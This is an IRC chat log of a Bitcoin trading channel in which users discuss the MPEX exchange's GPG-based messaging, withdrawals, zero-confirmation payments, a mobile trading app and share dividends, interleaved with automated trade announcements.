Feb 02 22:07:59 mjr_ if you mean accounted for as in, passed ti shareholders, yes. there's a special line in the monthly reports. Feb 02 22:08:04 cool Feb 02 22:08:10 that's what i meant Feb 02 22:08:11 and as to the brokers, you have to ask them, but most everyone does it. Feb 02 22:08:29 not doing it pretty much means bucket shop/fraud Feb 02 22:08:34 because it would be awesome to be able to contribute to a business that you are invested in...signing up helps your actual investment Feb 02 22:09:01 well, i really look forward to wider acceptance, and hopefully larger holdings for me... Feb 02 22:09:03 if only a little Feb 02 22:09:39 mjr_ that's the ide Feb 02 22:09:40 a Feb 02 22:09:42 Amadeo Giannini i would like to be like this guy Feb 02 22:09:47 and start lending Feb 02 22:10:04 set up a table on the docks and hand out money Feb 02 22:10:12 it worked out ok for him... Feb 02 22:10:32 not that easy tgo Feb 02 22:10:44 yeah Feb 02 22:11:02 i think what will have to happen is that you will have to use current practices, but denominate loans in btc Feb 02 22:11:05 since you guys are talking about mpex architecture: would be cool to make withdrawals more automated, e.g. as on the exchanges Feb 02 22:13:38 hmm, sounds spooky Feb 02 22:14:08 can you not automate that using the API? Feb 02 22:14:25 malaimo i have my doubts about that. Feb 02 22:14:30 all withdrawals are manually approved Feb 02 22:14:54 malaimo: if you want instant withdrawal, used a broker who provides that Feb 02 22:15:18 wow, there actually is one? Feb 02 22:15:43 I'm sure there is/are for relatively small amounts Feb 02 22:16:10 in coinbr case it's possible but far from guaranteed Feb 02 22:16:34 yeah, much depends on the broker's 'off mpex float' Feb 02 22:17:05 or the availability of cheap shortterm loans Feb 02 22:18:53 has anyone really started using the advanced bitcoin features? Feb 02 22:19:00 i think google is starting to seriously throttle my all my google code since i put the arbitrage spreadsheet on reddit :/ Feb 02 22:19:07 which ones? mjr_ Feb 02 22:19:12 grr Feb 02 22:19:17 third party arbitration Feb 02 22:19:20 contracts etc Feb 02 22:19:54 that could be used to form a trust service (maybe against the founding goals, but still, could be useful) Feb 02 22:20:21 like for example...i don't think i have ever read one negative article about mpex or mirceau_popescu Feb 02 22:20:21 i think there are a few things which use the m-of-n signature txns, but i've not seen any of the contracts or conditional sends Feb 02 22:20:22 they aren't directly supported by satoshi client Feb 02 22:20:24 etc Feb 02 22:20:38 so i would say most people would trust him Feb 02 22:20:59 < mjr_> like for example...i don't think i have ever read one negative article about mpex or mirceau_popescu <<< lolwut? Feb 02 22:21:01 the closest i ever read was sock puppet on SA..but that wasn't even really saying anything bad Feb 02 22:21:16 ie. no one has ever said he scammed them Feb 02 22:21:21 that i've read on a forum Feb 02 22:21:42 maybe chats i missed here, but i would say he has the equivalent of AAA credit within bitcoin Feb 02 22:21:44 there are people who're pissed about the way f.giga.etf went Feb 02 22:22:30 ok, i missed that discussion Feb 02 22:22:44 but, yeah, most to all of the 'bad' about mpex/mircea is that mpex looks ugly Feb 02 22:22:57 or 'i don't understand why you use gpg' Feb 02 22:23:00 lol, maybe should do more research, but still...within bitcoin who would have the highest "credit rating" Feb 02 22:23:05 in not so nice words Feb 02 22:23:07 lol, thats one of my favorite parts of it Feb 02 22:23:11 mpex UI Feb 02 22:23:22 look at reddit Feb 02 22:23:28 craigslist Feb 02 22:23:41 sometimes too much html5 and flash animations just get annoying Feb 02 22:24:01 ooh rounded corners and drop shadow Feb 02 22:24:31 a lot of current websites are very much "form over function" Feb 02 22:24:43 the f.giga.etf issue was basically, that the original gigavps asset stopped, and people thought that the mpex listing would take action to acquire the new gigavps Feb 02 22:25:12 what was that company doing? an etf of what? Feb 02 22:25:31 and mircea felt that taking action to acquire a new asset when the original one dissolved was outside of the f.gigga.etf contract Feb 02 22:25:39 (it wasn't really an etf) Feb 02 22:25:49 more like a single asset fund Feb 02 22:25:52 oh ok, i was going to say, i don't see the real point of an etf at the moment Feb 02 22:26:10 within bitcoin, there are only a few legit publicly traded companies you can buy all of them yourself Feb 02 22:26:16 mircea's a bit of a word anarchist sometimes Feb 02 22:26:29 [MPEX] [S.MPOE] 5800 @ 0.00067024 = 3.8874 BTC [+] Feb 02 22:26:45 oh by the way...i found the url to the site that i want to get to start taking bitcoins... Feb 02 22:26:58 options168.com Feb 02 22:27:09 one of my friends binary options ideas Feb 02 22:28:28 at the end of the day it's very similar to satoshidice (in the sense of expected value, house cut) Feb 02 22:28:42 not in the sense of using the block chain for randomness Feb 02 22:29:30 [BTCTC] [RSM] 89 @ 0.0098 = 0.8722 BTC [-] Feb 02 22:29:52 [MPEX] [S.DICE] 895 @ 0.00737449 = 6.6002 BTC [-] Feb 02 22:30:56 [BTCTC] [RSM] 12 @ 0.0099 = 0.1188 BTC [+] Feb 02 22:32:46 [MPEX] [S.DICE] 373 @ 0.00737449 = 2.7507 BTC [-] Feb 02 22:35:33 mirceau_popescu: upon furthor thought, i think that what you have set up IS the equivalent of a circuit...ie. you can verify communication between you and someone else, but i don't think it could work as a broadcast type message (i may be wrong) if i wanted it to take multiple hops, i would be vulnerable to MitM and phishing right? Feb 02 22:36:11 because only you can make sense of the message, since the message is encrypted...or am i mixing up my OSI model here :) Feb 02 22:37:06 ie PGP works for a point to point conversation, but if you want to make it routable you have to provide more info to the network (not actual content, but destination etc) Feb 02 22:38:20 is this how VPN would work too? unless i'm mistaken, i believe a VPN is encrypted (or can be) Feb 02 22:41:44 [MPEX] [S.MPOE] 5400 @ 0.00066716 = 3.6027 BTC [-] Feb 02 22:41:46 more confused knuckle draggers over at Reddit: http://www.reddit.com/r/Bitcoin/comments/17rae6/satoshi_dice_has_almost_tripled_since_its_ipo/ Feb 02 22:41:50 [MPEX] [S.MPOE] 1500 @ 0.00066715 = 1.0007 BTC [-] Feb 02 22:42:35 [MPEX] [S.MPOE] 4680 @ 0.00067014 = 3.1363 BTC [+] Feb 02 22:42:37 [MPEX] [S.MPOE] 4321 @ 0.00067194 = 2.9035 BTC [+] Feb 02 22:42:39 [MPEX] [S.MPOE] 9399 @ 0.00067229 = 6.3189 BTC [+] Feb 02 22:43:42 l;alala Feb 02 22:48:23 [MPEX] [S.MPOE] 4321 @ 0.00066737 = 2.8837 BTC [-] Feb 02 22:48:25 [MPEX] [S.MPOE] 279 @ 0.00066715 = 0.1861 BTC [-] Feb 02 22:50:08 o hey, im being discussed :D Feb 02 22:50:44 makomk malaimo markedathome maximian midnightmagic mircea_popescu mjr_ mod6 molecular Feb 02 22:50:48 mjr_ : if i wanted it to take multiple hops, i would be vulnerable to MitM and phishing right? << wrong Feb 02 22:51:42 they couldn't read the message, but theyt could disrupt it Feb 02 22:51:44 take for instance mpex db dump : http://mpex.co/db_dump.php Feb 02 22:51:44 right? Feb 02 22:51:49 go ahead, download it. Feb 02 22:52:02 what diff does it make ? you don't have the key for it. Feb 02 22:52:24 yes true Feb 02 22:52:28 and i took a look Feb 02 22:52:34 can't do anything with it Feb 02 22:52:48 so now. if i want to talk to all the users on mpex, i could just post a long file, made out of bits, each encrypted with a user's signature. Feb 02 22:53:02 everyone would only get his own, causwe that's the only one he can decrypt Feb 02 22:53:15 yeah Feb 02 22:53:22 conduit is completely irrelevant Feb 02 22:53:27 true Feb 02 22:53:32 thanks for the explanation Feb 02 22:53:45 this is why you can always trust a mpex "phisher" Feb 02 22:53:49 all he can do is proxy Feb 02 22:54:02 well that is what i meant...what if he doesn't pass on the messsage? Feb 02 22:54:09 or in other words why would he Feb 02 22:54:10 then you know it's not mpex Feb 02 22:54:17 yes, true Feb 02 22:54:22 that's all really. Feb 02 22:54:31 but i don't see many people bothering, no. there's no benefit Feb 02 22:54:36 i think it is a clean and very secure system Feb 02 22:54:48 i think so too. Feb 02 22:54:52 a lot easier than managing vpn's Feb 02 22:55:10 but do those address the issue of people being able to securely send messages? Feb 02 22:55:17 yeah. this would not be feasible if i tried to do it like it;'s currently done in the fiat finance world. Feb 02 22:55:31 but there's a BIG lesson in here. think about it : i have technoklogy that allows me to do what they do much cheaper. Feb 02 22:55:37 yes, true Feb 02 22:55:42 [MPEX] [S.MPOE] 10821 @ 0.00066715 = 7.2192 BTC [-] Feb 02 22:55:44 [MPEX] [S.MPOE] 279 @ 0.00066565 = 0.1857 BTC [-] Feb 02 22:55:46 i didn't get that last q. Feb 02 22:56:19 well that is what i love about this community, very grass roots Feb 02 22:56:23 bottom up planning Feb 02 22:56:29 [MPEX] [S.MPOE] 2735 @ 0.00067229 = 1.8387 BTC [+] Feb 02 22:56:31 [MPEX] [S.MPOE] 15 @ 0.00067504 = 0.0101 BTC [+] Feb 02 22:56:53 smickles http://www.reddit.com/r/Bitcoin/comments/17rjzk/mpex_this_is_what_we_mean_by_bitcoin_will/c887zpp Feb 02 22:56:58 thats some prime hatin' right there :D Feb 02 22:57:33 ah i had one other question/issue that i wanted to throw out here Feb 02 22:57:45 in instances like takin a cab or paying for fast food Feb 02 22:57:56 one to ten minutes for approval is not feasible... Feb 02 22:58:13 and obviously maybe it can't be applied to everything Feb 02 22:58:22 but is there any discussion on that subject? Feb 02 22:58:31 [MPEX] [S.MPOE] 3294 @ 0.00067505 = 2.2236 BTC [+] Feb 02 22:58:32 [MPEX] [S.MPOE] 4306 @ 0.00067504 = 2.9067 BTC [-] Feb 02 23:02:21 [MPEX] [S.MPOE] 1406 @ 0.00067505 = 0.9491 BTC [+] Feb 02 23:02:23 [MPEX] [S.MPOE] 6548 @ 0.00067516 = 4.4209 BTC [+] Feb 02 23:02:25 [MPEX] [S.MPOE] 3150 @ 0.00067653 = 2.1311 BTC [+] Feb 02 23:02:27 [MPEX] [S.MPOE] 1596 @ 0.00067746 = 1.0812 BTC [+] Feb 02 23:03:28 mjr_ yes. it mostly consists of my pr pointing out it doesn't work and people glazingvoer. Feb 02 23:03:54 https://bitcointalk.org/index.php?topic=134024.msg1493309#msg1493309 Feb 02 23:03:57 most recent example Feb 02 23:06:29 < mjr_> in instances like takin a cab or paying for fast food << in situations like that, some feel it is save enough to accept 0 confirmations Feb 02 23:07:07 also, there is one of those 'advanced' features you mentioned earler to solve this Feb 02 23:07:32 smickles, not really. that would be akin to city transportation not giving a fuck about security of chip cards Feb 02 23:07:38 thanks smickles, i thought that was a very nice response Feb 02 23:08:08 basically, you can create at tx which is for a significant amount (say 10 btc), but only gets approved in small in small bits, (say .1 btc) Feb 02 23:08:23 and good link mirceau Feb 02 23:08:30 i think that is also very true Feb 02 23:08:35 you don't need to rely on confirmations when your coins are stored at an exchange Feb 02 23:08:38 there are a lot of details, but you can safely accept the small bit part without any confirmation at all Feb 02 23:08:50 even unbroadcasted (less than 0 confirms) Feb 02 23:08:59 cool Feb 02 23:09:23 it's only been done as 'proof of work', so far as i know tho Feb 02 23:09:25 smickles, not really. that would be akin to city transportation not giving a fuck about security of chip cards << which they don't. Feb 02 23:10:03 bitcoin can change ownership without transactions within the blockchain Feb 02 23:10:26 course the hidden thing in all of this is that if mpex scales worth a shit everyone can just do push transactions. Feb 02 23:10:27 JohnGalt49ers: like via private key transfer? (what I was talking about is more complicated, and a lot more secure than that. I'll see if i can find the link) Feb 02 23:10:52 [MPEX] [S.MPOE] 12300 @ 0.00067162 = 8.2609 BTC [-] Feb 02 23:11:17 with badly done 0-confirmations we'll inevitably end up in credit card territory - everyone will pay for the fraud Feb 02 23:11:32 http://www.reddit.com/r/Bitcoin/comments/17rae6/satoshi_dice_has_almost_tripled_since_its_ipo/ ahaha this is sweet. Feb 02 23:11:38 owner is an asshole!!1 Feb 02 23:12:25 you have a nice reputation ;) Feb 02 23:12:32 anyone got issues getting to google? Feb 02 23:12:38 [MPEX] [S.DICE] 600 @ 0.00733364 = 4.4002 BTC [-] Feb 02 23:12:48 it's funny tho, why am i an asshole Feb 02 23:13:00 people get so wrapped up in their own mind Feb 02 23:14:12 http://www.reddit.com/r/Bitcoin/comments/17rjzk/mpex_this_is_what_we_mean_by_bitcoin_will/ also gets some lulz Feb 02 23:14:28 i think this is what i was talking about https://en.bitcoin.it/wiki/Contracts#Example_7:_Rapidly-adjusted_.28micro.29payments_to_a_pre-determined_party Feb 02 23:14:32 "the "shares" that MPEx has that it lets you buy and then sell ... how did they get them, and what exactly are these shares?" Feb 02 23:14:38 heavily philosophical too Feb 02 23:15:18 lolwut? Feb 02 23:15:19 yeah that's more sophisticated then what I had in mind Feb 02 23:15:43 explain to them that gpg, command line foo and mpex design should be percieved like the days when the internet filled up with idiots... we'd still stick to vms to have some peace of mind from it all Feb 02 23:16:06 "o noes, but nobody can get on mpex!1" Feb 02 23:16:16 oh gno! Feb 02 23:16:26 im on the other side of it, trying to hold the doors down lol Feb 02 23:16:40 nobody can get into mpex to the tune of 10 ppl a day or some shit Feb 02 23:17:03 "oh my god, MPEx is the geekiest stock exchange I've ever seen. you have to send commands via command line? no web interface?" << this is actually what attracted me to mpex! Feb 02 23:17:25 maximian i think a few people Feb 02 23:17:35 anyway if mod6 evergets the iphone app out that'll be funny Feb 02 23:17:42 :D Feb 02 23:17:54 hmm, i don't recall that article being much about race Feb 02 23:18:04 dude if you don't launch soon ima start sending escorts to your door at like 2am Feb 02 23:18:05 iphone app someday, android version soon Feb 02 23:18:06 topless Feb 02 23:18:08 and drunk. Feb 02 23:18:12 haha Feb 02 23:18:16 [MPEX] [S.MPOE] 4321 @ 0.00066569 = 2.8764 BTC [-] Feb 02 23:18:17 [MPEX] [S.MPOE] 3421 @ 0.00066565 = 2.2772 BTC [-] Feb 02 23:18:18 that might help Feb 02 23:18:33 smickles i think racist is what pinkos call people who call them pinkos Feb 02 23:18:46 one thing im gonna work on today is wrapping up json stat stuff. but then i gotta get that encryption stuff wrapped up. Feb 02 23:19:15 next version -- might be using bccapi maybe. Feb 02 23:19:20 we'll see what works Feb 02 23:19:24 mod6: iphone app for what? Feb 02 23:19:32 its for MPEx Feb 02 23:19:43 oh, nice Feb 02 23:19:57 [MPEX] [S.DICE] 1277 @ 0.00733364 = 9.3651 BTC [-] Feb 02 23:19:59 [MPEX] [S.DICE] 2231 @ 0.007395 = 16.4982 BTC [+] Feb 02 23:20:01 i have a ton of work done already for an Android version. its called BitOTTer... http://www.bitotter.com Feb 02 23:20:49 but.. its kinda rough with some of the encryption stuff - and making sure someones private key is secure is a challenge. Feb 02 23:21:17 which leads me to mircea_popescu's thing that he posted on trilema about the eyescan2pgpkeys Feb 02 23:21:17 encrypt it? Feb 02 23:21:26 pretty l33t there, verdad? Feb 02 23:21:30 innit! Feb 02 23:22:12 course asciilifeform is all no! you must use geiger counters! Feb 02 23:22:13 pizzaman1337: yup, i've implemented a way... i started off trying to do some other ways, like a keystore, etc.. but that didn't work out. Feb 02 23:22:52 mod6: just curious, how do you plan on monetizing that? (if at all) Feb 02 23:23:25 ate up a bunch of time too, now the code reads in the private key, will ask the user for a passphrase to encrypt the private key with, then that will be used to decrypt when needed to read in the priavte key upon launch. this will be a different passphrase that is used with the PGP private key itself, of course. Feb 02 23:23:28 why all the trouble? just use throwaway key. scan iris, pay 30 bucks, trade on teh mpex. problem solved. Feb 02 23:23:44 3. Conclusions Feb 02 23:23:44 Depending on BFL's shipping schedule, the network hashrate could be from ~ 120 Thps to ~ 290Thps, with Difficulty reaching between 15 and 40 million before mid May. Feb 02 23:23:44 jurov: ;) Feb 02 23:23:52 dudes sit around writing that shit on their blogs Feb 02 23:23:59 but do they trade x.idiff ? no they don't. Feb 02 23:24:00 sheesh. Feb 02 23:24:16 pizzaman1337: it'll be availble through the MPEx affiliate program. Feb 02 23:24:26 jurov ikr? Feb 02 23:24:57 yes right Feb 02 23:26:01 max diff at may's close is 220,868,234,397 Feb 02 23:26:14 or wait, what's the current diff Feb 02 23:26:16 ;;bc,diff Feb 02 23:26:17 3mn Feb 02 23:26:18 2968775.3320751 Feb 02 23:26:46 194,561,660,163 Feb 02 23:26:49 that's the max Feb 02 23:27:02 https://www.bitcoinasic.net/ Feb 02 23:27:04 whoa nelly! Feb 02 23:27:16 the azns were canadians from iraq! Feb 02 23:28:10 "We're Open Feb 02 23:28:10 All of the firmware and software we develop for our devices are completely opensource." Feb 02 23:28:21 no github link. completely open. brain fell out. Feb 02 23:28:41 minimum diff is 2968775 Feb 02 23:29:25 lol, copypast fail Feb 02 23:29:37 minumum diff is 45 Feb 02 23:34:00 [MPEX] [S.MPOE] 7100 @ 0.00067162 = 4.7685 BTC [+] Feb 02 23:34:02 [MPEX] [S.MPOE] 320 @ 0.00067229 = 0.2151 BTC [+] Feb 02 23:38:22 I've never quite understood why people feel so but hurt about the website. I mean, its really just a formality. It doesn't even need a website! lol Feb 02 23:38:25 http://memegenerator.net/instance/34241156 Feb 02 23:39:00 haha, *butthurt Feb 02 23:39:09 im seriously thinking of eventually taking the website off entirely. Feb 02 23:39:34 I mean, it exists as a way for people to go, "Oh hey! It exists!" Feb 02 23:39:40 pretty much Feb 02 23:39:48 but, it is totally not required. Feb 02 23:39:49 ya Feb 02 23:39:50 :) Feb 02 23:40:10 also that would fall nicely into the plan to tell noobs coinbr is all there is, mpex is the old version Feb 02 23:40:10 course, since i was gonna have to pipe orders in somehow Feb 02 23:40:13 and have a gateway Feb 02 23:40:18 80 made the most sense Feb 02 23:40:23 and if you're gonna have webserver up anyway... Feb 02 23:40:26 might as well Feb 02 23:40:47 lol jurov prepare for drama Feb 02 23:41:18 this avalon thread is so full of win Feb 02 23:41:23 even giga is trolling them Feb 02 23:41:33 TROLL HARDER! Feb 02 23:41:36 lol Feb 02 23:41:36 url Feb 02 23:41:48 [MPEX] [S.MPOE] 4100 @ 0.00067229 = 2.7564 BTC [+] Feb 02 23:41:59 oh and MOAR CAPZ too Feb 02 23:42:02 JUST CUZ Feb 02 23:45:20 Just looking at the Jan s.dice statement. 1.2M BTC in handle is stunning… wow! Feb 02 23:47:03 the whole thing is what, two guys and a server? Feb 02 23:47:13 if that. Feb 02 23:47:35 no but in seriousness, they're pretty smart guys, survived the recent doublespend attacks that wiped a few of the betting people Feb 02 23:47:51 this should be evoorhee's full time job… he's going to be fabulously rich Feb 02 23:48:06 yeah, bright and competent Feb 02 23:48:35 it may become that, who knows. Feb 02 23:49:48 I took 6k from him Feb 02 23:50:02 $ Feb 02 23:50:16 please you'r welcome this month again Feb 02 23:50:33 took as in, gambled ? Feb 02 23:50:47 yes, 7 btc to 500 something Feb 02 23:51:20 [BTCTC] [GSDPT] 988 @ 0.0079 = 7.8052 BTC [+] Feb 02 23:51:22 [BTCTC] [GSDPT] 12 @ 0.008 = 0.096 BTC [+] Feb 02 23:52:01 this is so weird... Feb 02 23:52:07 pre-dividends, crickets. Feb 02 23:52:13 dividends paid, people start buying Feb 02 23:52:20 why not buy 6 hours earlier get divs too ?! Feb 02 23:53:06 weird indeed Feb 02 23:54:13 amateurs who don't get the whole dividends thing? Feb 02 23:54:24 maybe yea Feb 02 23:54:41 there were some reasonable blocks bought on mpex pre-divs Feb 02 23:55:16 [HAVELOCK] [SDICE] 5 @ 0.765 = 3.825 BTC [-] Feb 02 23:55:17 [HAVELOCK] [SDICE] 9 @ 0.7567 = 6.8103 BTC [-] Feb 02 23:55:19 [HAVELOCK] [SDICE] 10 @ 0.760001 = 7.6 BTC [+] Feb 02 23:55:20 [HAVELOCK] [SDICE] 10 @ 0.76 = 7.6 BTC [-] Feb 02 23:55:21 [HAVELOCK] [SDICE] 37 @ 0.7567519 = 27.9998 BTC [-] Feb 02 23:56:16 [HAVELOCK] [SDICE] 4 @ 0.7567 = 3.0268 BTC [-] Feb 02 23:58:14 [HAVELOCK] [SDICE] 6 @ 0.7567 = 4.5402 BTC [-] Feb 02 23:58:59 yeah I don't know why people would wait to buy until after the dividend lol Feb 02 23:59:10 you're doing it wrong Feb 02 23:59:43 maybe to pick up some "cheap" shares from people who want out after the most recent dividend... Feb 02 23:59:55 except nobody sold Feb 03 00:00:01 i was expecting at least some unwind Feb 03 00:00:04 but... crickets. Feb 03 00:04:16 [HAVELOCK] [SDICE] 16 @ 0.7567 = 12.1072 BTC [-] Feb 03 00:06:15 [HAVELOCK] [SDICE] 3 @ 0.7567 = 2.2701 BTC [-] Feb 03 00:06:17 i think its awesome that you can buy shares literally right before the dividend and still get them Feb 03 00:06:31 especially if the market doesn't seem to want to price them in Feb 03 00:07:19 i see no reason not to just hold it, but you could just get in and out on dividend day] Feb 03 00:07:35 I was going to add though, it is great to have a way to submit orders right through the textarea with the submit button. I used to do a lot of orders by hand until I wrote the perl thingy. Feb 03 00:08:41 [MPEX] [S.MPOE] 4300 @ 0.00067189 = 2.8891 BTC [-] Feb 03 00:08:43 [MPEX] [S.MPOE] 4321 @ 0.0006658 = 2.8769 BTC [-] Feb 03 00:08:44 [MPEX] [S.MPOE] 7979 @ 0.00066565 = 5.3112 BTC [-] Feb 03 00:09:35 So that's an awesome way to do manual orders or do some testing. Feb 03 00:11:14 this is true, yeah. Feb 03 00:11:29 [MPEX] [S.MPOE] 1571 @ 0.00066565 = 1.0457 BTC [-] Feb 03 00:11:31 [MPEX] [S.MPOE] 6550 @ 0.0006649 = 4.3551 BTC [-] Feb 03 00:11:33 [MPEX] [S.MPOE] 2929 @ 0.00066411 = 1.9452 BTC [-] Feb 03 00:12:31 https://bitcointalk.org/index.php?topic=140700.msg1499150#msg1499150 << mpoe-pr is rubbing off on people! Feb 03 00:12:40 Even with BitOTTer, the users will have to know how to use PGP (gpg) tools to use it though. So learning this is still required. Feb 03 00:13:10 At minimum they'll have to export their private key from their keyring to an asciiarmored output, so that at least... Feb 03 00:13:37 (that along with their public key) Feb 03 00:14:18 those files will have to be copied onto the device in the manual way, and then they'll be able to be read in and secured, etc. Feb 03 00:14:42 [MPEX] [S.MPOE] 7803 @ 0.00066411 = 5.1821 BTC [-] Feb 03 00:14:44 [MPEX] [S.MPOE] 4732 @ 0.00066316 = 3.1381 BTC [-] Feb 03 00:14:46 But still, people have this kneejerk reaction about PGP. But I'm always like "But PGP is your friend!!" Feb 03 00:18:00 there was a great xkcd about that... Feb 03 00:18:21 about how maybe strong encryption should have been classified as a weapon so it'd be protected by the second amendment lol Feb 03 00:19:03 [MPEX] [S.MPOE] 4321 @ 0.00067219 = 2.9045 BTC [+] Feb 03 00:19:05 [MPEX] [S.MPOE] 9829 @ 0.00067229 = 6.6079 BTC [+] Feb 03 00:20:27 http://xkcd.com/364/ << haha Feb 03 00:20:43 [BTCTC] [RSM] 100 @ 0.01 = 1 BTC [+] Feb 03 00:20:58 [MPEX] [S.DICE] 150 @ 0.00729495 = 1.0942 BTC [-] Feb 03 00:20:59 lol Feb 03 00:20:59 [MPEX] [S.DICE] 271 @ 0.00729494 = 1.9769 BTC [-] Feb 03 00:21:04 [MPEX] [S.DICE] 813 @ 0.00724493 = 5.8901 BTC [-] Feb 03 00:21:06 [MPEX] [S.DICE] 205 @ 0.00724226 = 1.4847 BTC [-] Feb 03 00:21:07 [MPEX] [S.DICE] 623 @ 0.00720781 = 4.4905 BTC [-] Feb 03 00:21:16 [MPEX] [S.DICE] 707 @ 0.00720505 = 5.094 BTC [-] Feb 03 00:21:17 [MPEX] [S.DICE] 231 @ 0.00718281 = 1.6592 BTC [-] Feb 03 00:21:31 wow Feb 03 00:21:44 cool stuff, was that a market order that took a few levels? Feb 03 00:21:46 a ok Feb 03 00:21:53 ya by the looks of it Feb 03 00:23:28 ok maybe a silly question but i don't think it was in the faq (i'll double check) is there a way to see level II info for the stocks? Feb 03 00:24:09 is the json feed the only way? Feb 03 00:29:02 [MPEX] [S.MPOE] 618 @ 0.00066316 = 0.4098 BTC [-] Feb 03 00:29:06 [MPEX] [S.MPOE] 2894 @ 0.00066215 = 1.9163 BTC [-] Feb 03 00:29:08 well, seen live.coinbr.com ? Feb 03 00:29:33 i have not, i will take a look at it Feb 03 00:30:08 oh yeah i think i have been there but it never renders correctly Feb 03 00:31:11 raw data is in the jsons/rss Feb 03 00:31:25 pretty much everything else you have to make yourself Feb 03 00:32:20 all good Feb 03 00:32:40 i think there is some image which doesn't load and it blocks the actual symbols Feb 03 00:32:47 if you make something a buncha people like/use there may be a market for you in it Feb 03 00:32:54 good point Feb 03 00:33:15 i really like the layout and design of clarkmoody Feb 03 00:33:23 just wish it had more exchanges and mpex data Feb 03 00:33:32 once you go black... Feb 03 00:33:55 why doesn't it have mpex data ? Feb 03 00:34:00 i thought it was pretty much user configured Feb 03 00:34:20 as far as i can see it just takes mt. gox Feb 03 00:34:29 and i have not seen any way to change those settings Feb 03 00:35:29 mjr_, which browser? Feb 03 00:35:35 chrome Feb 03 00:35:47 is that not supported? Feb 03 00:36:17 live.coinbr uses vanilla google charts ... can't believe google can't make its own shit work right Feb 03 00:36:34 ahahah this is good Feb 03 00:36:55 mjr_: try sending screenshot, i'll look what else it can be Feb 03 00:37:21 could be me, i just did inspect element and it pops up Feb 03 00:37:31 but if i close the inspect element, it doesn't load Feb 03 00:37:44 it's the chart that is not loading so it could be a problem with my handling of svg i guess Feb 03 00:38:00 no js errors? Feb 03 00:40:56 does not appear to be js related Feb 03 00:41:04 at least all the scripts seem to have loaded properly Feb 03 00:41:23 dunno then Feb 03 00:41:30 yeah i have a sreenshot if you wanna see Feb 03 00:41:43 weirdly enough i can't right click on the area where the chart would be Feb 03 00:41:55 i have to do it in the tiny sliver at the top in order to get to inspect element Feb 03 00:42:01 i can try other web browsers if that would help Feb 03 00:42:38 if on the screnshot is anything beyond [Back to CoinBr] [S.DICE] [S.BBET] Show trades for last: Feb 03 00:42:44 then i'm interested Feb 03 00:43:34 doesn't even show all of that, weirdly enough it works in IE so maybe issues on my end Feb 03 00:43:42 (surely issues on my end) Feb 03 00:43:46 [MPEX] [S.MPOE] 4200 @ 0.00067229 = 2.8236 BTC [+] Feb 03 00:45:12 btw, i think i left there commented js code to read mpex rss feed... so if anyone wants an example Feb 03 00:45:28 thanks i will look into it Feb 03 00:46:10 one quick security question Feb 03 00:46:30 where do you hold the shares that you buy? are they in an account on mpex? Feb 03 00:46:57 they have to be there, for online trading to be possible Feb 03 00:47:04 yes, ok Feb 03 00:47:12 i am planning on more of a buy and hold approach Feb 03 00:47:41 but i have no issues with shares on mpex or coinbr Feb 03 00:48:02 i was planning on a paper wallet that i could continue to pour coins into, but would not be connected to anything Feb 03 00:48:26 and was wondering if there was something similar for the shares etc Feb 03 00:48:26 [MPEX] [S.DICE] 1700 @ 0.007395 = 12.5715 BTC [+] Feb 03 00:48:31 there is none known way to take shares out of mpex and nto safe if that's what you mean Feb 03 00:48:50 yeah no big deal, it is the most secure i've seen really Feb 03 00:48:57 so probably better to leave them there Feb 03 00:49:16 but for the coins, i was thinking paper wallet in safe deposit box Feb 03 00:49:27 with some for buying and such Feb 03 00:49:32 in a separate wallet Feb 03 00:50:28 I think the shares are probably safer in MPs machine than in mine :-P Feb 03 00:50:35 yeah Feb 03 00:50:40 i agree Feb 03 00:51:16 well, there are tries to make p2p exchanges... but so far it looks they are not usable for anything near mpex volume/speed Feb 03 00:51:33 yeah, i realy like mpex Feb 03 00:51:34 eventually mpex will be p2p too im pretty sure Feb 03 00:51:38 and i personally wait for someone to aptly and comprehensively blog about them Feb 03 00:51:41 but none of the current nonsense. Feb 03 00:52:45 jurov i'd argue that making copies of the mpex_db is pretty safe. Feb 03 00:52:53 in a paper wallet sort of way Feb 03 00:53:46 "do you have the shares safely stored?" "yes, i have whole mpex database in cold storage" Feb 03 00:54:05 something like that. better than paper wallet cause well... you can't read it Feb 03 01:00:15 really nice financials by the way Feb 03 01:08:08 mircea_popescu: you realize that the webserver - trade engine is what a lot of banks are migrating to right? Feb 03 01:08:39 thestringpuller, the core of his argument isn't this Feb 03 01:09:00 for some values of "a lot". Feb 03 01:09:20 "Learn how to avoid ripoffs - send $5." Feb 03 01:09:53 it's about users identifying themselves and using any channel, possibly insecure to communicate with exchange Feb 03 01:10:07 [BTCTC] [BASIC-MINING] 11 @ 0.35 = 3.85 BTC [+] Feb 03 01:10:23 http://www.news-record.com/home/679910-63/mr-buffett-im-sorry << this is pretty good! Feb 03 01:10:45 as opposed to providing byzantine infrastructure to create pipe to safely communicate Feb 03 01:11:34 well yeah, i think that is the more robust system Feb 03 01:11:46 to expect that people will try to steal the messages Feb 03 01:11:52 instead of trusting in infrastructure Feb 03 01:12:16 i feel like usually the central planning type of things assumes perfect implementation Feb 03 01:12:23 and plans accordingly Feb 03 01:12:46 and are shocked when things fail Feb 03 01:13:27 it's ego thing, everyone wants to build something big that will outlast him Feb 03 01:13:29 For that reason last year a London bank processor went offline for 2 hours and 90% of the population were unable to make any withdrawals or deposits... Feb 03 01:13:40 creating liability for descendants in turn Feb 03 01:13:43 yeah, or the facebook ipo with nasdaq Feb 03 01:13:44 Most banks are moving to a distributed system... Feb 03 01:14:04 well their processors at least Feb 03 01:14:33 in general, big complex systems are going to have cracks while small distributed systems CAN be easy to implement once, and then multiplied in a scalable way Feb 03 01:14:48 how does S.DICE and/or S.BBET decide when to pay dividend? I can't seem to find it or determine any sort of a pattern from the history Feb 03 01:15:37 on 1st they get roaring drunk then sleep and wake up , then start working on report Feb 03 01:15:44 and then pay divs Feb 03 01:15:52 that what it looked like Feb 03 01:16:03 it seems to be within two days after issuing monthly report Feb 03 01:17:06 by the way...the al gore interview on the daily show was pretty interesting and they talked about high frequency Feb 03 01:17:08 looks like cool thing to do... maybe i'll get public Feb 03 01:17:50 just did a rough select how much coinbr made in january. my head spinned a bit. sadly, no lacohol around. Feb 03 01:18:11 i take it that's good news? Feb 03 01:18:15 how much did it make ? Feb 03 01:19:37 more than bbet. Feb 03 01:19:46 ;> Feb 03 01:20:05 lol Feb 03 01:20:10 mircea should demand fees from you for working on his turf Feb 03 01:20:13 well... it's laso been running longer :D Feb 03 01:20:23 i believe that he does collect fees :) Feb 03 01:20:26 he does Feb 03 01:20:31 there are fees on all trades Feb 03 01:20:33 directly from jurov though "I want 50%" Feb 03 01:20:37 lol Feb 03 01:20:41 "Or else something could happen..." Feb 03 01:20:46 Call it "insurance" Feb 03 01:20:46 